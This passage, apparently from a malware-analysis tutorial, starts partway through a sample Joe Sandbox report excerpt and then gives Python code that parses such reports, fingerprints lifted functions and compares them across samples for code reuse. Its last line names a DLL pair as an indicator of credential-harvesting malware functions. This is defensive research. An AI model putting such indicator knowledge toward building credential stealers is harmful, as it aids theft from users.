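• memcpy.MSVCRT(?,?,00000010), ref: 004161F4
• memcpy.MSVCRT(?,?,00000004), ref: 00416218
• memcpy.MSVCRT(?,?,00000008), ref: 00416265
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
• Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
• Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# 'name.MODULE(args), ref: ADDR', optionally prefixed by the subcall marker; args may be absent.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


def parse_records(text):
    """Return one dict per analysed function: direct 'apis', 'subcalls', 'strings',
    plus one key/value dict per metadata section (e.g. record['Similarity'])."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            # A record starts at 'APIs', or at 'Strings' when the previous one is already
            # complete (a function with no API calls begins directly with its Strings block).
            if line == "APIs" or (line == "Strings" and (current is None or "Similarity" in current)):
                if current is not None:
                    records.append(current)
                current = {"apis": [], "subcalls": [], "strings": []}
            section = line
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if not m:
                continue  # unknown call layout: skip rather than guess
            call = m.groupdict()
            call["args"] = call["args"].split(",") if call["args"] else []
            (current["subcalls"] if call["caller"] else current["apis"]).append(call)
        elif section == "Strings":
            current["strings"].append(item)
        elif section is not None:
            key, _, value = item.partition(":")  # split on the first colon only
            current.setdefault(section, {})[key.strip()] = value.strip()
    if current is not None:
        records.append(current)
    return records


def fingerprint(record):
    """Cross-sample identity for a function: Joe Sandbox's API String ID plus Opcode ID."""
    sim = record.get("Similarity", {})
    return sim.get("API String ID", ""), sim.get("Opcode ID", "")


def referenced_dlls(record):
    """DLL names a function touches, taken from call arguments and the String ID field."""
    names = set()
    for call in record["apis"] + record["subcalls"]:
        names.update(a for a in call["args"] if a.lower().endswith(".dll"))
    for s in record.get("Similarity", {}).get("String ID", "").split("$"):
        if s.lower().endswith(".dll"):
            names.add(s)
    return sorted(names)


def shared_fingerprints(records_a, records_b):
    """Fingerprints present in both parsed reports: candidate code reuse between samples."""
    return {fingerprint(r) for r in records_a} & {fingerprint(r) for r in records_b}
```

Feed `parse_records` the text of a whole "Functions" section from two reports and intersect with `shared_fingerprints` to see which lifted functions are byte-identical in opcode terms; `referenced_dlls` is the quick filter for the credential-harvesting functions, since the sqlite3.dll/nss3.dll pair shows up in call arguments before any string is decrypted.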